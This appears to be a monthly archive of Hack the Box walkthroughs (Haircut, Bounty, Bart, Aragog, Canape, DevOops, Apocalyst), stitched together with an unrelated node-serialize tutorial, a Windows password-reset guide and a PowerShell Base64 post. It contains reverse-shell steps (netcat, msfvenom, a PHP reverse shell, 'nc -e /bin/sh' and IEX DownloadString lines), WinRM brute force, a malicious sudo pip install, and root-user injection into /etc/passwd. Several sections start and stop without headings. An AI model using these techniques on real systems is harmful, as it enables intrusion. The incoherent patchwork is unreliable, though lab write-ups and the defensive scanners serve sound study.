Month: October 2018

Hello friends!! Today we are going to solve another CTF challenge, “Haircut”, which is categorised as a retired lab presented by Hack the Box for online penetration-testing practice. Solving the challenges in this lab is not easy unless you have some knowledge of web application penetration testing (WAPT). Let’s start and learn how to analyse a vulnerability in a network and then exploit it to retrieve the desired information.

Level: Intermediate

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are accessible online, they have static IPs. The IP of Haircut is 10.10.10.24, so let’s begin with nmap port enumeration.

nmap -A 10.10.10.24

From the image below you can observe that ports 22 and 80 are open on the victim’s machine.

Knowing that port 80 is open, we opened the victim’s IP in a browser and got the page shown below.

Then I used the DirBuster tool with the directory-list-2.3-medium.txt wordlist to brute-force directories on http://10.10.10.24, with the PHP file extension added.

As a result, it found an uploads directory with a 403 response and an exposed.php file with a 200 OK response.

The eval() function is a common function in Node.js that is easy to exploit if the data passed to it is not filtered correctly. While reviewing the source code of some Node.js projects and researching Node.js application security, I found this function used in some projects in a way that is exploitable.

The source code for this tutorial can be obtained from the link. You need to install Node.js and Express first.

To start the code, run: node index.js

This first part uses the unserialize feature of a Node.js module. The same exploitation method applies to PHP, Java and others; I will show the exploit for some of these languages in later tutorials.

We will use the Node.js module node-serialize in this example. Let’s analyse it in depth. This module contains an eval() call that may be exploited if we do not check the data passed to it correctly.

The function eval() evaluates JavaScript code represented as a string, as documented.

Look at line 74 of the module’s source code:

    if (obj[key].indexOf(FUNCFLAG) === 0) {
        obj[key] = eval('(' + obj[key].substring(FUNCFLAG.length) + ')');
    }

This code loops through the object’s properties; if a property is flagged as a function, eval() is called on it. So let’s try to inject some JavaScript code into it.

On unserialize, it loops through the properties of the object created from the string. Because say is a function, (function () {return 'Hi ' + this.name}) is passed to eval: eval("(function () {return 'Hi ' + this.name})").

“Hi” is of course not shown on the console log, because the function is never called.

We need the code to execute while the object is being processed by the unserialize function, because we do not know what the application does with the object or how it is processed later. So we need to pass eval code that is executed immediately, to show Hi. That is, we append () to the function expression so that it becomes an immediately-invoked function expression (IIFE) and runs inside eval itself.

Note: before forwarding the modified content in Burp Suite, we should set up the netcat listener on the Kali machine and keep it ready.

nc -lvp 4444

In order to obtain a proper TTY shell, we spawned one with the following Python one-liner:

python -c 'import pty; pty.spawn("/bin/bash")'

Hurray!! We got a reverse shell from the target machine.

Let’s have a quick look at the contents:

ls

We navigated through many folders, but found the interesting stuff in the Documents folder.

cd Documents

Here we can see that there is a user.txt file; let’s read its contents.

cat user.txt

Finally, we got our first flag, i.e. the output of the user.txt file.

On further navigation, we also opened the script.py file out of curiosity. Running cat script.py shows that it only prints “Script is running..”.

cat script.py
print "Script is running.."

Note: this is an indication that we should examine the log files to see whether this script is being run, and whether it runs on a periodic basis.

The best next step is to examine the contents of the log directory under /var.

cd /var/log

Let’s see the files listed over here

ls

As we can see, there are multiple syslog files in this folder. The old logs are zipped and numbered accordingly; the latest entries are always stored in the file named syslog. So we will open the syslog file and try to find out if there is something interesting going on.

cat syslog

We will notice that there is a cron job running every 5 minutes, which runs script.py (in /home/sun/Documents) and redirects its output to output.txt.

Now we can try to put our own content in the script.py file. For this, let’s generate a reverse shell with the following command:

msfvenom -p cmd/unix/reverse_python lhost=10.10.14.3 lport=1234 R

Copy the msfvenom output and save it on the Kali Desktop as script.py; it will be used in the subsequent steps.
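A quick check for the cron misconfiguration described above, as an added example that is not part of the original walkthrough: it reads syslog-style CRON lines, pulls out the scheduled commands and reports any script that other users could modify (which is exactly what lets us swap script.py for a reverse shell). The log excerpt and file tree are constructed for the example; the hostname, PIDs and paths are hypothetical.

```python
# Added example (not from the original walkthrough): parse CRON entries out of
# a syslog excerpt and flag scheduled scripts whose mode lets other users
# modify them. The log lines and file layout are constructed; hostname,
# PIDs and paths are hypothetical.
import os
import re
import stat
import tempfile

# Matches "CRON[1201]: (root) CMD (python /path/script.py > /path/out.txt)"
CRON_CMD = re.compile(r"CRON\[\d+\]: \((?P<user>[^)]+)\) CMD \((?P<cmd>.*)\)\s*$")


def cron_commands(syslog_text):
    """Yield (cron_user, command) for every CRON CMD line in the log text."""
    for line in syslog_text.splitlines():
        m = CRON_CMD.search(line)
        if m:
            yield m.group("user"), m.group("cmd")


def writable_by_others(path):
    """True if the file exists and is group- or world-writable."""
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        return False
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def risky_cron_scripts(syslog_text):
    """Return [(cron_user, path)] for absolute-path arguments of cron commands
    that another user could edit: each one is code execution as cron_user."""
    findings = []
    for user, cmd in cron_commands(syslog_text):
        for tok in cmd.split():          # redirection targets like "> out.txt" are tokens too
            if tok.startswith("/") and writable_by_others(tok):
                findings.append((user, tok))
    return findings


def build_sample():
    """Create a throwaway directory tree and a syslog excerpt pointing into it."""
    root = tempfile.mkdtemp()
    docs = os.path.join(root, "home", "sun", "Documents")
    bindir = os.path.join(root, "usr", "local", "bin")
    os.makedirs(docs)
    os.makedirs(bindir)
    script = os.path.join(docs, "script.py")
    backup = os.path.join(bindir, "backup.sh")
    with open(script, "w") as f:
        f.write('print "Script is running.."\n')
    with open(backup, "w") as f:
        f.write("#!/bin/sh\nexit 0\n")
    os.chmod(script, 0o666)   # world-writable: the misconfiguration
    os.chmod(backup, 0o755)   # only the owner can write: fine
    return (
        f"Oct  8 12:25:01 target CRON[1201]: (root) CMD (python {script} > {docs}/output.txt)\n"
        f"Oct  8 12:25:01 target CRON[1202]: (root) CMD ({backup})\n"
        "Oct  8 12:26:01 target sshd[1300]: Accepted publickey for sun from 10.10.14.3 port 50000\n"
    )


if __name__ == "__main__":
    for user, path in risky_cron_scripts(build_sample()):
        print(f"cron runs {path} as {user}, but other users can write to it")
```

Against a real box, feed it the output of cat /var/log/syslog (and the rotated copies) rather than build_sample(); a hit on a script run as root is the privilege-escalation path used in this walkthrough.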

Author: hd7exploit

Today we are going to solve another CTF challenge, “Bounty”. It is a retired vulnerable lab presented by Hack the Box to help pentesters perform online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Medium

Task: To find user.txt and root.txt file

Let’s start off with our basic nmap command to find out the open ports and services.

I checked the source code of the page, but unfortunately there wasn’t anything interesting there. Since we had nothing else to go on, I started some dirb scans.

We already know that the server is running Microsoft IIS, so I decided to try an IIS-specific wordlist against the site (the following dirb scans have been condensed for clarity):

I then tried to access these two directories, but was given a 403 error both times.

After doing a bit more research on the aspnet_client folder structure, I discovered that we could work out the ASP.NET version by fuzzing the system_web directory for version-named subdirectories. So I saved the list found here and used dirb to try them all:

---- Scanning URL: http://10.10.10.93/aspnet_client/system_web/ ----

==> DIRECTORY: http://10.10.10.93/aspnet_client/system_web/2_0_50727/

Thanks to this, we know for sure that the server is running ASP.NET 2.0.50727 (the .NET Framework 2.0 runtime; this is not the IIS version itself). Whilst this might not be useful, it’s always good to enumerate where we can.

That being said, we still get a 403 when trying to access this newly found directory, so I swapped over to a bigger wordlist:

I took a look inside the uploadedfiles directory, but received another 403 error. However, since this directory exists, we can assume that there is a web page somewhere that lets us upload files.

I then started my final dirb scan on the website in an attempt to find this upload page. Seeing as we know the server is running Microsoft IIS, I decided to scan only for .aspx files, because they’re very common on such systems.

It looks like we’re going to have to either try fuzzing the upload, or enumerate further.

Since fuzzing is never fun, I decided to try to find some more IIS-related file extensions.

Fortunately, I just had to Google “microsoft iis file extensions” to find this forum page, which says the following:

We are serving up files for our own application for download from web servers, including IIS. One such file has the .config extension. Turns out that IIS won’t serve this because it thinks it’s a config file of its own.

Let’s now try uploading a .config file to see if that’s allowed:

It looks like we can successfully upload files! After doing some research on .config files, I came across this article, which outlines an easy attack we can perform (provided the server executes the file). We’ll do something similar to the technique used with PHP reverse shells: we upload a web.config that contains ASP code, and the server should interpret whatever we write and show us the output.

We can perform an initial test by uploading a script found on that same website, which should simply perform a small addition and output the result:

To brute-force WinRM we can use the Metasploit module auxiliary/scanner/winrm/winrm_login.

We’ll start with h.potter, since he’s listed as a developer, so there’s a good chance he has credentials on the box.

msf > use auxiliary/scanner/winrm/winrm_login
msf auxiliary(scanner/winrm/winrm_login) > show options
Module options (auxiliary/scanner/winrm/winrm_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DOMAIN            WORKSTATION      yes       The domain to use for Windows authentification
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             5985             yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   URI               /wsman           yes       The URI of the WinRM service
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
   VHOST                              no        HTTP server virtual host

msf auxiliary(scanner/winrm/winrm_login) > set RHOSTS 10.10.10.81
RHOSTS => 10.10.10.81
msf auxiliary(scanner/winrm/winrm_login) > set USERNAME h.potter
USERNAME => h.potter
msf auxiliary(scanner/winrm/winrm_login) > set PASS_FILE /usr/share/wordlists/fasttrack.txt
PASS_FILE => /usr/share/wordlists/fasttrack.txt
msf auxiliary(scanner/winrm/winrm_login) > set DOMAIN BART.HTB
DOMAIN => BART.HTB
msf auxiliary(scanner/winrm/winrm_login) > run
~~~
~~~
~~~
[+] 10.10.10.81:5985 - Login Successful: BART.HTB\h.potter:Password1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Yes! We can see that Mr. Potter has some weak credentials. Trying another Metasploit module with these credentials to get code execution is unsuccessful; we are just presented with 500 errors in response. This is because Metasploit’s WinRM modules do not currently support message encryption, and by default WinRM requires encryption unless the administrator has specifically disabled it.

Then we opened the target IP in a web browser, but didn’t find anything remarkable there.

Since we found nothing on port 80, we thought to use DirBuster for a web directory brute-force attack.

Here I found a /host.php file in its results.

When I explored /host.php in the web browser I found the message “There are 4294967294 possible hosts for”, as shown in the image below. So I searched Google for 4294967294 hosts, which corresponds to the netmask 255.255.255.254 found in the test.txt file above.

This means we can POST the test.txt file here with the help of Burp Suite.

So let’s capture the request and send the intercepted data to Repeater.

As we had predicted, test.txt is in XML format, so we tried to validate an XXE injection.

Yuppiee! We got the SSH private key successfully, which I copied into a text file named key.

Then assign permission 600 to the saved key (id_rsa) and try to connect with SSH. You can observe that we logged in successfully and got a TTY shell on the victim’s machine; now let’s find user.txt.

Inside /var/www/html we saw /dev_wiki, and it was good to see that this folder holds WordPress setup and configuration files.

So I simply added the host IP 10.10.10.78 with the host name aragog to our local hosts file, /etc/hosts.

So we explored aragog/dev_wiki in our web browser and got the WordPress home page.

As you can observe, inside /blog we found a message to Florian from Cliff in which he complains about the mess of WordPress being restored every few minutes.

So with the help of Google I found the pspy32s binary, downloaded it onto the victim’s VM inside /tmp and gave it execute permission.

pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute.

cd /tmp
wget http://10.10.14.6/pspy32s
chmod +x pspy32s

After some time we realised that there is a cron job that frequently deletes the dev_wiki folder and replaces it with the backup folder, and that a script, wp-login.py, is run shortly after that happens.

Now let’s manipulate the content of the wp-user.php file and place new PHP code inside it to capture the username and password that the script submits.

Today we are going to solve another CTF challenge, “Canape”, which is available online for those who want to increase their skill in penetration testing and black-box testing. Canape is a retired vulnerable lab presented by Hack the Box for online penetration-testing practice according to your experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Intermediate

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are available online, they have static IPs. The IP of Canape is 10.10.10.70, so let’s begin with nmap port enumeration.

After getting a reverse shell, we dug deeper. We checked for open ports on the target machine that might be listening only locally and found a service running on port 5984: Apache CouchDB.

The above command will dump the password, and we find the password for SSH login as the user homer.

Alternatively, this CouchDB version is vulnerable to CVE-2017-12635, so I found a publicly available exploit (https://www.exploit-db.com/exploits/44498/) that creates a user with admin privileges in the CouchDB database, and… the exploit worked!!

homer@canape:/tmp$ sudo /usr/bin/pip install shell.tar.gz
The directory '/home/homer/.cache/pip/http' or its parent directory is not owned by the current user and the cache has been disabled. Please check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
The directory '/home/homer/.cache/pip' or its parent directory is not owned by the current user and caching wheels has been disabled. check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
Processing ./shell.tar.gz
Installing collected packages: UNKNOWN
Running setup.py install for UNKNOWN ... -

The administrator password is the one password on your system that is most often compromised, whether because you forget or lose it or because an unknown intruder has taken over the admin account. The consequence is that you become unable to access any of the Windows Server system contents: files, folders, media and so on. In most cases, users who forget or lose their admin password call a computer expert or take the system to a service centre to unlock it, but that creates a lot of hassle and unnecessary expense.

So in this article we demonstrate a few basic methods which will help you reset the local administrator password on Windows Server 2012 R2 without any external help.

Command Prompt is an excellent command-line interpreter which can be used to perform a wide range of tasks with a few commands in a short time. Here we use cmd to remove the forgotten password. Read the steps carefully:

Step 1. First, create a bootable disk on a CD/DVD or USB stick and insert it into the locked computer.

Step 2. Choose your language and click the “Troubleshoot” option.

Step 3. Click the “Command Prompt” button to start it in advanced mode and type the command below when the black console window appears:

Today we are going to solve another CTF challenge, “DevOops”. DevOops is a retired vulnerable lab presented by Hack the Box to help pentesters perform online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Medium

Task: To find user.txt and root.txt file

Note: since these labs are available online, they have a static IP. The IP of DevOops is 10.10.10.91.

Walkthrough

Let’s start off with our basic nmap command to find out the open ports and services.

From the Nmap scan we found that ports 22 and 5000 are the only open ports on the target, so let’s first navigate to port 5000 in a web browser. Exploring the URL brings up the web page shown in the image below.

Since we didn’t get any remarkable clue from the home page, we opted for the Dirb tool for directory enumeration and executed the following command.

So we explored http://10.10.10.91:5000/upload and were welcomed by the web page shown below. This page lets you upload an XML file containing the XML elements Author, Subject and Content. For that reason, we created an XML file with the following code and saved it as 1.xml.

We obtained many strings, as shown in the following image, which might be an SSH key for root login. So we tried some of the keys with the git show command to display their contents, and obtained an RSA private key which was not working properly.

We will take a look at the source code of the web pages and see if there is anything interesting there. Modifying our XML file to read /home/roosa/deploy/src/feed.py instead reveals something our gobuster scan missed: another endpoint called newpost.

Looking closer at the code for that endpoint, we see that it uses pickle and simply base64-decodes the request data before unpickling it. As it performs no sanitisation, we can have some fun.
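The unsafe pattern the page describes (base64-decode the request body, then pickle.loads it), reduced to its core as an added example that is not the application’s own code, beside a restricted unpickler that rejects the same payload. The handler names are hypothetical stand-ins for the newpost endpoint, and the attacker’s command string is only recorded by a dummy callable, never executed.

```python
# Added example (not the DevOops application's own code): a newpost-style
# handler that unpickles request data, the object an attacker posts to it,
# and a restricted unpickler. Names are hypothetical; the "command" is only
# recorded, never run.
import base64
import builtins
import io
import pickle

EXECUTED = []          # records what the malicious pickle managed to call


def record_command(cmd):
    """Stand-in for os.system(cmd): logs the command instead of running it."""
    EXECUTED.append(cmd)
    return 0


class Evil:
    """Whatever __reduce__ returns is called by pickle.loads, before the
    application ever looks at the 'object' it asked for."""

    def __init__(self, cmd):
        self.cmd = cmd

    def __reduce__(self):
        return (record_command, (self.cmd,))


def vulnerable_newpost(request_data):
    """What the page describes: base64-decode the body and unpickle it."""
    return pickle.loads(base64.b64decode(request_data))


class RestrictedUnpickler(pickle.Unpickler):
    """Allow only a fixed set of harmless builtins. pickle resolves every
    callable through find_class, so the (module, name) pair __reduce__ smuggled
    in is vetted here and refused."""
    ALLOWED = {("builtins", "dict"), ("builtins", "list"), ("builtins", "str")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def hardened_newpost(request_data):
    """Same decode step, but through the restricted unpickler."""
    return RestrictedUnpickler(io.BytesIO(base64.b64decode(request_data))).load()


def attack_request(cmd):
    """Build the body an attacker would POST to the endpoint."""
    return base64.b64encode(pickle.dumps(Evil(cmd))).decode()


def demo():
    """Return (commands run by the vulnerable handler, hardened handler blocked it,
    hardened handler ran nothing, hardened handler still accepts a plain dict)."""
    EXECUTED.clear()
    body = attack_request("nc -e /bin/sh 10.10.14.3 1234")   # hypothetical payload
    vulnerable_newpost(body)           # __reduce__ fires during loads
    ran = list(EXECUTED)
    EXECUTED.clear()
    try:
        hardened_newpost(body)
        blocked = False
    except pickle.UnpicklingError:
        blocked = True
    legit = hardened_newpost(base64.b64encode(pickle.dumps({"Author": "x"})).decode())
    return ran, blocked, len(EXECUTED) == 0, legit


if __name__ == "__main__":
    print(demo())
```

The real fix is not a better find_class but not unpickling untrusted input at all: the endpoint takes three text fields, which JSON carries without any deserialisation of executable state.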

Hello friends!! Today we are going to solve another CTF challenge, “Apocalyst”, which is available online for those who want to increase their skill in penetration testing and black-box testing. Apocalyst is a retired vulnerable lab presented by Hack the Box for online penetration-testing practice according to your experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level. We are going to start a new series on Hack the Box beginning with Apocalyst, which is designed for beginners.

Level: Beginner

Task: find user.txt and root.txt file in victim’s machine.

Since these labs are available online, they have static IPs. The IP of Apocalyst is 10.10.10.46, so let’s begin with nmap port enumeration.

CeWL & Dirbuster
All of the common wordlists fail to return anything relevant when fuzzing for files and directories.
Generating a wordlist from the strings on the website with CeWL uncovers a lot more during fuzzing.

root@kali:~/htb/calamity# cewl 10.10.10.46 > wordlist.txt

When we run gobuster again with our custom wordlist, we can see that all requests have a response size of 157 except one, which has a size of 175. That means it has different content from all the other requests, or there is an abnormal error.

So next we decided to explore http://apocalyst.htb/Rightiousness in the browser, and what we saw was an image, as shown below.

The image got us wondering whether there was a clue hidden behind it, so we decided to do steganalysis on the image using the steghide --info image.jpg command in the Kali terminal. We found that a list.txt file is embedded in the image.

Now we need to extract the list.txt file embedded in the image, so we used steghide --extract -sf image.jpg. We simply leave the passphrase prompt blank and press Enter. list.txt has been extracted successfully to our Desktop.

Again we used wpscan, this time to brute-force the password of the login name falaraki that we found earlier with wpscan. Here we used

…and were in!

Now we can upload our PHP reverse shell through the Appearance Editor. I got my PHP shell from PenTestMonkey; I’m not going to paste the entire code here because it’s a lot of code. All you have to do is change the IP and port number where it says // CHANGE THIS:

$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS

Save the changes to the file once your reverse shell is in, and set up your netcat listener. Then trigger the PHP reverse shell by requesting the edited file:

http://apocalyst.htb/wp-content/themes/twentyseventeen/404.php

Now we ran ls -la in falaraki’s home directory, as shown. Here we discovered a file named .secret, which left us curious to read its content with cat .secret. It contains base64-encoded text, which we need to decode to read the content behind it.

In another terminal we fetched the LinEnum tool from GitHub, which is well known for checking privilege-escalation opportunities. First we downloaded the LinEnum-master.zip file from GitHub. After that we served the LinEnum-master folder with a simple HTTP server on port 80, using the command

python -m SimpleHTTPServer 80

Now we download the shared file with wget http://10.10.14.3/LinEnum.sh as the falaraki@apocalyst user. We then need to make LinEnum.sh executable with chmod 777 LinEnum.sh (chmod +x would suffice), and run it with ./LinEnum.sh.

The LinEnum tool listed all the sensitive files that falaraki can read or write.

In a new terminal we use openssl to generate a salted MD5 password hash for a new user. The command used is

Now, using vi /etc/passwd, we edit the passwd file to add a new user. The line for the new user is username:<salted hash of the password>:0:0:root:/root:/bin/bash; UID and GID 0 make it a root account. We save the new user with :wq.

Simple Obfuscation with PowerShell using Base64 Encoding

I recently received a question from someone wanting to know how I encoded a string of text on my blog site. Back in January 2013, I competed in Jeff Hicks’ PowerShell Challenge, which was held by TrainSignal. One of the questions had an encoded command which you were to decode. I figured out that the -EncodedCommand parameter of PowerShell.exe could not only be used to run commands that are encoded with Base64, but could also be used to easily decode a string of text that was encoded with Base64.

powershell.exe /?

The help for PowerShell.exe also shows you how to encode a command with Base64:

Encoding something like the domain name for this blog site is easy enough:
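As an added example, not from the original post: the same encoding done in Python (UTF-16LE, then Base64, which is what -EncodedCommand expects), plus the reverse operation a defender needs when an encoded PowerShell command turns up in process-creation logs. The sample command lines are constructed, and the IP and URL in them are hypothetical.

```python
# Added example (not from the original post): produce and consume the Base64
# that PowerShell.exe -EncodedCommand expects (UTF-16LE bytes, Base64-encoded),
# and pull the encoded argument out of a logged command line. Sample command
# lines are constructed; the IP and URL are hypothetical.
import base64
import re

# PowerShell accepts unambiguous prefixes of -EncodedCommand; the ones seen
# most in the wild are -e, -ec, -enc and the full name. "-ep" (ExecutionPolicy)
# must not match, hence the whitespace requirement after the flag.
ENC_FLAG = re.compile(
    r"(?<!\S)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{4,})", re.IGNORECASE
)


def encode_command(command):
    """Return the Base64 string PowerShell.exe -EncodedCommand accepts."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_command(b64):
    """Inverse of encode_command; raises on input that is not UTF-16LE text."""
    raw = base64.b64decode(b64, validate=True)
    return raw.decode("utf-16-le")


def extract_encoded(command_line):
    """Return the decoded script if command_line carries an encoded command,
    otherwise None. Decode failures (e.g. '-e' followed by something that is
    not UTF-16LE) are treated as no match rather than as errors."""
    m = ENC_FLAG.search(command_line)
    if not m:
        return None
    try:
        return decode_command(m.group(1))
    except (ValueError, UnicodeDecodeError):
        return None


def scan(lines):
    """Return [(original line, decoded script)] for every encoded invocation."""
    hits = []
    for line in lines:
        script = extract_encoded(line)
        if script is not None:
            hits.append((line, script))
    return hits


# Constructed process-creation command lines: one benign, two encoded.
SAMPLE_PROCESS_LOG = [
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell.exe -nop -w hidden -enc "
    + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.3/a.ps1')"),
    "powershell.exe -ep Bypass -e ZABpAHIA",   # ZABpAHIA decodes to "dir"
]


if __name__ == "__main__":
    for line, script in scan(SAMPLE_PROCESS_LOG):
        print(f"{line[:60]}... -> {script}")
```

The UTF-16LE step is the detail that trips people up: a plain base64 of the ASCII text is something PowerShell will accept as an argument and then fail on, which is why decoding tools that try UTF-8 first render these strings as alternating NUL bytes.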